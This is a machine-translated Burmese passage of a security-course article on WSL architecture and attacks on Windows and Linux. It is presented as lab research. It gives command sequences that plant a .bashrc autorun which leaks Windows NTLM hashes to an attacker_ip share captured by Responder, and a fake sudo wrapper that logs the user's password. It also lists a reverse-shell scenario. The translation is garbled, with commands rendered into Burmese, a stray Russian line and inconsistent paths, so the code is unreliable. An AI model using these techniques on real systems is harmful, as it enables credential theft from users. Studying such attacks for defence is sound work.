🥇WSL စမ်းသပ်မှုများ။ အပိုင်း ၁

ဟယ်လို၊ OTUS သည် အောက်တိုဘာလတွင် သင်တန်းစီးကြောင်းအသစ်ကို စတင်ခဲ့သည်။ "လုံခြုံရေး Linux». သင်တန်းစတင်မည့်မျှော်လင့်ချက်တွင် ကျွန်ုပ်တို့၏ဆရာတစ်ဦးဖြစ်သော Alexander Kolesnikov မှရေးသားထားသော ဆောင်းပါးတစ်ပုဒ်ကို သင့်အားမျှဝေထားပါသည်။

2016 ခုနှစ်တွင် Microsoft မှ WSL နည်းပညာအသစ်ကို IT အသိုင်းအဝိုင်းသို့ မိတ်ဆက်ခဲ့သည် (Wအတွင်းပိုင်း Subsystem အတွက် Linux)၊ ၎င်းသည် ရေရှည်တွင် သာမန်နှင့် အဆင့်မြင့် OS အသုံးပြုသူများအကြား လူကြိုက်များမှုအတွက် တိုက်ပွဲဝင်နေသော ယခင်က မညှိနှိုင်းနိုင်သော ပြိုင်ဘက်များကို ပေါင်းစည်းနိုင်စေခဲ့သည်- Windows и Linuxဒီနည်းပညာက OS tools တွေကို အသုံးပြုနိုင်စွမ်းကို ပေးစွမ်းပါတယ်။ Linux ဝိုင်းရံထားသည် Windows စတင်ရန်မလိုဘဲ Linuxဥပမာအားဖြင့် multi-boot ကိုအသုံးပြုခြင်း။ Habr တွင် WSL အသုံးပြုခြင်း၏ အကျိုးကျေးဇူးများကိုဖော်ပြသည့် ဆောင်းပါးများစွာကို သင်ရှာတွေ့နိုင်ပါသည်။ သို့သော်၊ ဝမ်းနည်းစရာကောင်းသည်မှာ၊ ဤစာရေးချိန်တွင် operating system များ၏ ဤ symbiosis ၏ လုံခြုံရေးဆိုင်ရာ လေ့လာမှုများကို ဤအရင်းအမြစ်တွင် မတွေ့ရှိခဲ့ပါ။ ဤပို့စ်သည် ၎င်းကိုပြုပြင်ရန် ကြိုးပမ်းမှုတစ်ခုဖြစ်သည်။ ဆောင်းပါးတွင် WSL 1 နှင့် 2 architectures များ၏ အင်္ဂါရပ်များကို ဆွေးနွေးပြီး ဤနည်းပညာများကို အသုံးပြုသည့် စနစ်များအပေါ် တိုက်ခိုက်မှုများ၏ ဥပမာများစွာကို ခွဲခြမ်းစိတ်ဖြာပါမည်။ ဆောင်းပါးကို အပိုင်းနှစ်ပိုင်းခွဲထားသည်။ ပထမအပိုင်းတွင် တိုက်ခိုက်မှု၏ အဓိကသီအိုရီနည်းလမ်းများကို တင်ပြပါမည်။ Linux и Windowsဒုတိယဆောင်းပါးမှာ စမ်းသပ်ပတ်ဝန်းကျင်တစ်ခု တည်ဆောက်ခြင်းနှင့် တိုက်ခိုက်မှုများကို ပြန်လည်ထုတ်လုပ်ခြင်းအကြောင်း ဆွေးနွေးပါမည်။

WSL 1- ဗိသုကာအင်္ဂါရပ်များ

WSL လုံခြုံရေးပြဿနာများကို အပြည့်အဝနားလည်ရန်အတွက် subsystem ၏ အကောင်အထည်ဖော်မှုနှင့် ဆက်စပ်နေသော အဓိကကွဲပြားချက်များကို ဖော်ထုတ်ရန် လိုအပ်ပါသည်။ WSL မှ ဖြေရှင်းပေးသည့် အသုံးပြုသူ၏ အဓိကလိုအပ်ချက်များထဲမှ တစ်ခုမှာ terminal access ကို ဖွင့်ပေးခြင်း ဖြစ်သည်။ Linux OS ပါရှိသော host ပေါ်ရှိ စနစ်များ Windowsထို့အပြင်၊ ပေးထားသော တွဲဖက်အသုံးပြုနိုင်မှုသည် အလွန်ပင် မူရင်းအတိုင်းဖြစ်သောကြောင့် executable ဖိုင်များသည် Linux (ELF) ကို စနစ်ထဲသို့ တိုက်ရိုက်စတင်နိုင်သည် Windowsဤရည်မှန်းချက်များ အောင်မြင်ရန်အတွက် Windows 10 အပလီကေးရှင်းများကို စတင်အသုံးပြုနိုင်စေမည့် အထူးဆပ်စနစ်တစ်ခုကို ဖန်တီးထားသည် Linux သတ်မှတ်ထားသော system call များကို အသုံးပြုခြင်း - ထို့ကြောင့် syscall များကို map လုပ်ရန် ကြိုးပမ်းမှုတစ်ခု ပြုလုပ်ခဲ့သည် Linux အပေါ် Windowsရုပ်ပိုင်းဆိုင်ရာအရ၊ ၎င်းကို ဒရိုက်ဘာအသစ်များနှင့် လုပ်ငန်းစဉ်ပုံစံအသစ်တစ်ခု ထည့်သွင်းခြင်းဖြင့် အကောင်အထည်ဖော်ခဲ့သည်။ ရုပ်ပိုင်းဆိုင်ရာအရ၊ ဗိသုကာပုံစံမှာ ဤသို့ဖြစ်သည်-

အခြေခံအားဖြင့်၊ လည်ပတ်မှုစနစ်နှင့် အပြန်အလှန်ဆက်သွယ်မှု Linux kernel module အများအပြားနှင့် အထူး process အမျိုးအစား pico ကို အသုံးပြု၍ စီစဉ်ဖွဲ့စည်းထားသည်။ အထက်ပါပုံတွင် instance တွင် run နေသော process ကို ပြသထားသည်။ Linux host မှာ native ဖြစ်ရမှာဖြစ်ပြီး ပုံမှန် application တွေလိုပဲ resource တွေကိုပဲ အသုံးပြုရပါမယ်။ Windowsဒါပေမယ့် ဒါကို ဘယ်လိုအောင်မြင်နိုင်မလဲ။ ဒီစီမံကိန်းမှာ drawbridge လုပ်ငန်းစဉ်ဆိုင်ရာ သဘောတရားများကို တီထွင်ခဲ့ကြသည် Windows၊ ၎င်းသည် အခြား OS မှ အပလီကေးရှင်းတစ်ခုကို လုပ်ဆောင်ရန် လိုအပ်သော လည်ပတ်မှုစနစ် အစိတ်အပိုင်းများအားလုံး (၎င်း၏ဗားရှင်းပေါ် မူတည်၍) ပံ့ပိုးပေးသည်။

အဆိုပြုထားသော abstraction သည် operating system (အထူးသဖြင့် Windows) သည် အခြား OS လုပ်ငန်းစဉ်တစ်ခု စတင်ရန် မျှော်လင့်ပြီး အထွေထွေချဉ်းကပ်မှုကို အဆိုပြုခဲ့သည်။

ထို့ကြောင့် pico လုပ်ငန်းစဉ်အတွင်းရှိ မည်သည့် application ကိုမဆို kernel ကို ထည့်သွင်းစဉ်းစားခြင်းမရှိဘဲ run နိုင်သည်။ Windows:

စနစ်ခေါ်ဆိုမှုများ၏ လိုက်ဖက်ညီမှုနှင့် ဘာသာပြန်ဆိုခြင်းဆိုင်ရာ ပြဿနာများကို အထူးဝန်ဆောင်မှုပေးသူများက ဖြေရှင်းပေးရမည်။
ဝင်ရောက်ခွင့်ထိန်းချုပ်မှုကို Security Monitor မှတစ်ဆင့် အကောင်အထည်ဖော်ရမည်။ မော်နီတာသည် kernel တွင်တည်ရှိပြီး ထို့ကြောင့် Windows ထိုသို့သော လုပ်ငန်းစဉ်များအတွက် ပံ့ပိုးပေးသူအဖြစ် လုပ်ဆောင်နိုင်သည့် ဒရိုက်ဘာအသစ်တစ်ခုပုံစံဖြင့် အဆင့်မြှင့်တင်မှုတစ်ခု လိုအပ်ခဲ့သည်။ pico ပုံစံငယ်လုပ်ငန်းစဉ်ကို အောက်တွင် ပုံကြမ်းအတိုင်း ပြသထားသည်။

ဖိုင်စနစ်ကြောင့် Linux စာလုံးအကြီးအသေး ခွဲခြားသိရှိနိုင်သော ဖိုင်နှင့် ဒိုင်ထရီအမည်များကို အသုံးပြုသည်၊ Windows WSL နှင့်အတူအသုံးပြုရန်အတွက် ဖိုင်စနစ်အမျိုးအစားနှစ်ခုကို ထည့်သွင်းထားသည်- VolFS နှင့် DriveFS။ VolFS သည် ဖိုင်စနစ် အကောင်အထည်ဖော်မှုတစ်ခုဖြစ်သည်။ LinuxDriveFS သည် စည်းမျဉ်းများအတိုင်း လုပ်ဆောင်သော ဖိုင်စနစ်တစ်ခုဖြစ်သည်။ Windows၊ သို့သော် အမည်များ၏ စာလုံးအကြီးအသေး ခွဲခြားသိရှိနိုင်မှု ရွေးချယ်ခွင့် ရှိသည်။

WSL 2

WSL 1 မှာ ကန့်သတ်ချက်အများအပြားရှိခဲ့ပြီး ကျယ်ပြန့်တဲ့ အလုပ်တွေကို ဖြေရှင်းရာမှာ အသုံးမပြုနိုင်ခဲ့ပါဘူး- ဥပမာအားဖြင့် 32-bit ကို လည်ပတ်နိုင်စွမ်း မရှိခဲ့ပါဘူး။ Linux အပလီကေးရှင်းများသည် device drivers များကို အသုံးမပြုနိုင်ပါ။ ထို့ကြောင့် ၂၀၂၀ ခုနှစ်တွင် WSL 2 ကို ထုတ်ပြန်ခဲ့ပြီး subsystem တည်ဆောက်ခြင်းဆိုင်ရာ ချဉ်းကပ်မှုကို ပြောင်းလဲစေခဲ့သည်။ WSL 2 သည် WSL 1 ၏ resource consumption ဝိသေသလက္ခဏာများနှင့် ကိုက်ညီသော optimized virtual machine တစ်ခုဖြစ်သည်။ ယခုအခါ user ဖြေရှင်းနေသော ပြဿနာများအပေါ် မူတည်၍ OS သည် Windowsအလုပ်လုပ်ရန်အတွက် လိုအပ်သော subsystem ဗားရှင်းကို ရွေးချယ်နိုင်သည် Linuxအလားအလာရှိသော အားနည်းချက်များကို လျှော့ချရန်အတွက် WSL 2 ကို Hyper-V ကို အခြေခံ၍ အကောင်အထည်ဖော်ခဲ့သည်။ Windows 10ဒီပုံစံမှာ Windows operating system kernel ကို သီးခြားစီ run နိုင်တဲ့စွမ်းရည်ရှိတယ် LinuxWSL ရဲ့ version 1 ကို ဖွံ့ဖြိုးတိုးတက်မှုရဲ့ ဦးတည်ရာကို ပြသဖို့ ရည်ရွယ်ပြီး beta feature အနေနဲ့ မိတ်ဆက်ခဲ့တာကို သတိရသင့်ပါတယ်။ Windows ဤနေရာတွင်၊ ထို့ကြောင့် Hyper-V သို့ကူးပြောင်းခြင်းသည် မလွဲမသွေဖြစ်လာခဲ့သည်။ နောက်ဆုံးဗိသုကာပုံစံမှာ ဤသို့ဖြစ်သည်-

ဒီဗားရှင်းမှာ system kernel တွေက Windows и Linux တစ်ခုချင်းစီတွင် ၎င်း၏ကိုယ်ပိုင်အရင်းအမြစ်များရှိပြီး ဖိုင်စနစ်အတွင်း၌သာ ထပ်တူကျနေသော်လည်း ဤထပ်တူကျမှုသည် ပြီးပြည့်စုံခြင်းမရှိသေးပါ။ ဖိုင်စနစ်များအကြား အပြန်အလှန်ဆက်သွယ်မှုကို 9P protocol တွင်လည်ပတ်သော client-server wrapper မှတစ်ဆင့် ပြီးမြောက်သည်။

ယနေ့တွင် Microsoft သည် WSL 1 နှင့် WSL 2 အကြား ပြောင်းနိုင်သည့် စွမ်းရည်ကို ပံ့ပိုးပေးထားသည်။ ဗားရှင်းနှစ်မျိုးစလုံးကို အသုံးပြုနိုင်သည်။

WSL လုံခြုံရေး

လောလောဆယ်တွင်၊ စနစ်ခွဲများကြား ဆက်သွယ်ရေးကို တိုက်ခိုက်ရန်အတွက် တရားဝင် OS ကိရိယာများကို အသုံးပြုခြင်းအတွက် နည်းလမ်းအချို့ကို ဖော်ပြသည့် အလုပ်များစွာရှိသည်။ စာရေးချိန်တွင် တိုက်ခိုက်မှုများ၏ ဆက်စပ်မှုကို စစ်ဆေးရန် ၎င်းတို့၏ script များကို အသုံးပြုပါမည်။ အထွေထွေတိုက်ခိုက်မှုများနှင့် အခြေအနေများစာရင်း-

1. ဖိုင်စနစ် အကောင်အထည်ဖော်မှု- ဝင်ရောက်ခွင့်၊ မျှဝေထားသော လမ်းညွှန်များ/ဒေတာဖလှယ်မှု ယန္တရားများ ရရှိမှု။

လက်လှမ်းမီမှု စည်းမျဉ်းများ ချိုးဖောက်မှုများကို ဆုံးဖြတ်ရန် သုတေသန ပြုလုပ်ခဲ့သည်။ Linux FS->Windows FS၊ Windows FS->Linux FS. သုတေသနသည် ပစ်မှတ် OS အတွင်း ပေးထားသည့် ဖိုင်တစ်ခုကို မွမ်းမံနိုင်မှုကို သရုပ်ပြခဲ့သည်။ အစားထိုးရန်၊ ထပ်တူများဖန်တီးရန်နှင့် ဖိုင်စနစ်၏ အစိတ်အပိုင်းများကို ဖျက်ရန်လည်း ကြိုးပမ်းခဲ့သည်။

ဇာတ်လမ်း-

က။ လည်ပတ်မှုစနစ်မှ တိုက်ခိုက်မှု Windows — OS ၏ /etc directory မှ ဖိုင်များကို ပြုပြင်မွမ်းမံခြင်း Linux.
ခ။ လည်ပတ်မှုစနစ်မှ တိုက်ခိုက်မှု Linux — ဒိုင်ထရီများရှိ ဖိုင်များကို ပြုပြင်မွမ်းမံခြင်း- C:Windows, C:Program Files, C:Users<User>

2. network stack ကို အကောင်အထည်ဖော်ခြင်း။

လည်ပတ်မှုစနစ်မှ တိုက်ခိုက်မှုများ၏ ဥပမာများကို အသုံးပြု၍ သုတေသနကို ပြုလုပ်ခဲ့သည်။ Linux အပေါ် Windowsကွန်ရက် stack ၏ လည်ပတ်မှုဆိုင်ရာ အင်္ဂါရပ်များ၊ အထူးသဖြင့် အရင်းအမြစ်အမျိုးမျိုးအတွက် ၎င်း၏ အထောက်အထားစိစစ်ခြင်း ယန္တရားများကို အသုံးချခံခဲ့ရသည်။

ဇာတ်လမ်း-

စနစ်တွင် အလုပ်များနေသော port သို့ ဝင်ရောက်ခွင့်ဖွင့်ခြင်း Windows
သင့်လျော်သောအခွင့်အရေးမရှိဘဲ ဆိပ်ကမ်းတစ်ခုဖွင့်လှစ်ခြင်း။
လည်ပတ်မှုစနစ်တွင် elf ဖိုင်ကို အသုံးပြု၍ reverse shell တစ်ခုကို လုပ်ဆောင်ခြင်း Windows.

3. WSL စနစ်ခွဲကို အသုံးပြု၍ အန္တရာယ်ရှိသော ဆော့ဖ်ဝဲ လုပ်ငန်းစဉ်များ စတင်ခြင်းကို ဖုံးကွယ်ခြင်း။

သုတေသနသည် ရိုးရှင်းသောအချက်အပေါ် အခြေခံထားသည် - လုံခြုံရေးစနစ်ခွဲများသည် WSL 1 ကိစ္စတွင် တရားဝင်ပံ့ပိုးပေးသူကို အသုံးပြု၍ လုပ်ဆောင်သည့် အခြား kernel အတွင်းရှိ အဖြစ်အပျက်များကို ကြားဖြတ်မရနိုင်ပါ။ WSL 2 ၏ကိစ္စရပ်တွင်၊ ဖြစ်ပေါ်လာသည့်ဖြစ်ရပ်များကို ကြည့်ရှုရန် နည်းလမ်းမရှိပါ။ ပေါ့ပါးသော virtual machine အတွင်းရှိ သီးခြား kernel တစ်ခုတွင်။

ဇာတ်လမ်း-

1) စနစ်သို့အဝေးမှဝင်ရောက်ခွင့်အတွက် အပလီကေးရှင်းကိုဖွင့်ပြီး မှတ်တမ်းတင်ထားသောဖြစ်ရပ်များကိုကြည့်ရှုပါ။

WSL 1 စမ်းသပ်ချက်များ- Hash Hijacking (OS) Windows)

လက်တွေ့ကျတဲ့အပိုင်းကို နောက်ဆုံးတော့ ရောက်ပါပြီ။ ပထမဦးစွာ စမ်းသပ်ပတ်ဝန်းကျင်ကို တည်ဆောက်ဖို့ လိုအပ်ပါတယ်။ စမ်းသပ်မှုအားလုံးကို စမ်းသပ်ခုံတန်းမှာ ပြုလုပ်သွားမှာဖြစ်ပါတယ်။ Windows 10 ၂၀၀၄။ WSL အတွက် ရွေးချယ်ထားသော လည်ပတ်မှုစနစ် ပုံရိပ်သည် Ubuntu ဧပြီလ ၁၈ ရက်။ ပုံကို ကျပန်းရွေးချယ်ခဲ့ပြီး အခြားပုံများကလည်း အလားတူပင် အလုပ်လုပ်ပါလိမ့်မည်။ စင်တပ်ဆင်ရန် အမိန့်ပေးချက်များ-

အရင်ဦးဆုံး လွှင့်တင်ရမယ်။ powershell.exe စီမံခန့်ခွဲသူအဖြစ်

WSL 1 အတွက် သင်သည် command များကို လုပ်ဆောင်ရန် လိုအပ်သည်-

ဖွင့်ပါ-Windowsရွေးချယ်နိုင်သောအင်္ဂါရပ် -အွန်လိုင်း -အင်္ဂါရပ်အမည် Microsoft-Windows-လက်အောက်ခံစနစ်-Linux #WSL လုပ်ဆောင်ချက်ကို ဖွင့်ပါ
Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-ဖိုင်ထွက် ~/Ubuntu.appx -UseBasicParsing #ပုံတင်ပါ Linux မိုက်ခရိုဆော့ဖ် စတိုးမှ

Ubuntu.appx install —root # ပုံကို Install လုပ်ပါ။

စနစ်ထည့်သွင်းခြင်းလုပ်ငန်းစဉ်ကို နှိပ်ပြီး root ထက် အခွင့်အရေးနည်းသော အသုံးပြုသူအသစ်ကို ဖန်တီးရပါမည်။ ကျွန်ုပ်တို့၏စမ်းသပ်မှုများအတွက်၊ ၎င်းသည် ပုံမှန်အသုံးပြုသူ Sam ဖြစ်လိမ့်မည်။

Restart-Computer #Reboot

setup ကို reboot လုပ်ပြီးရင် bash command ကို run လို့ရပါတယ်။ အရာအားလုံး မှန်ကန်စွာ အလုပ်လုပ်ရင် console မှာ ဒီလို output ကို တွေ့ရပါလိမ့်မယ်။ Windows:

ကျွန်ုပ်တို့သည် Kali distribution ကို attacker ၏ machine အဖြစ်အသုံးပြုပါမည်။ Linux, စက်အားလုံးသည် တူညီသော ဒေသတွင်းကွန်ရက်တွင် ရှိရမည်။

စက်မှာ WSL ကို unprivileged access ရှိတယ်လို့ ယူဆကြည့်ရအောင်။ Windowsလည်ပတ်မှုစနစ်ကို တိုက်ခိုက်ကြည့်ကြရအောင်။ Linuxကနေ အမိန့်ပေးခိုင်းစေတာ၊ Linuxတိုက်ခိုက်မှုကို အကောင်အထည်ဖော်ရန်အတွက်၊ ကျွန်ုပ်တို့သည် ရိုးရှင်းသော autorun နည်းပညာကို အသုံးပြုပါမည် - ကျွန်ုပ်တို့၏ script ကို environment ထဲသို့ ထည့်သွင်းပါမည်။ Linuxဒီလိုလုပ်ဖို့အတွက် ဖိုင်ကို ပြောင်းလဲဖို့ လိုအပ်ပါတယ် .bashrc.

WSL ဖြင့် စက်တွင် ကျွန်ုပ်တို့ လုပ်ဆောင်သည်-

	1. bash
	2. Переходим в домашнюю директорию пользователя: cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

ကာလီကားဖြင့် Linux ကျွန်ုပ်တို့လုပ်ဆောင်သည်-

1. Responder -I eth0 -rdvw

ကားတစ်စီးအားဖြင့် Windows bash ကို run ကြည့်ရအောင်။

Kali စက်မှာ ရလဒ်တွေကို ကျွန်တော်တို့ စောင့်နေပါတယ်။ Linux:

ဒါဆိုရင် user hash တွေရပြီ Windows စနစ်ပေါ်တွင် command တစ်ခုကို run ခြင်းဖြင့် WSL subsystem မှတစ်ဆင့် Linux.

WSL 1 စမ်းသပ်မှုများ- အသုံးပြုသူ စကားဝှက် (OS) ရယူခြင်း Linux)

နောက်ထပ် စမ်းသပ်မှုတစ်ခု လုပ်ကြည့်ရအောင်။ ဤစစ်ဆေးမှုအတွင်း ကျွန်ုပ်တို့သည် ဖိုင်သို့ထည့်ပါမည်။ .bashrc operating system user password ကိုရယူရန် command အများအပြား Linux.

bash ကိုဖွင့်ပြီး command များကိုရိုက်ကြပါစို့။

1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

တိုက်ခိုက်မှုအောင်မြင်ရန်အတွက် အသုံးပြုသူ Sam သည် terminal တွင် sudo ကိုခေါ်ရမည်။ Linuxဒီနောက်မှာ OS အသုံးပြုသူရဲ့ စကားဝှက်ကို Linux ဖိုင်ထဲမှာ ရှိနေမှာပါ pass.txt:

တိုက်ခိုက်မှုများကို အကောင်အထည်ဖော်ခြင်းအား သီအိုရီအချက်အလက်များအတွက်သာ ပေးအပ်ခဲ့ခြင်းဖြစ်သည်။

ဆောင်းပါး၏ နောက်အပိုင်းတွင် 9P ပရိုတိုကောကို အကောင်အထည်ဖော်ခြင်း၊ ဤပရိုတိုကောအတွက် စကင်နာတစ်ခု ဖန်တီးခြင်းနှင့် ၎င်းကိုအသုံးပြု၍ တိုက်ခိုက်မှုကိုလည်း လုပ်ဆောင်ခြင်းတို့ကို ဖော်ပြပါမည်။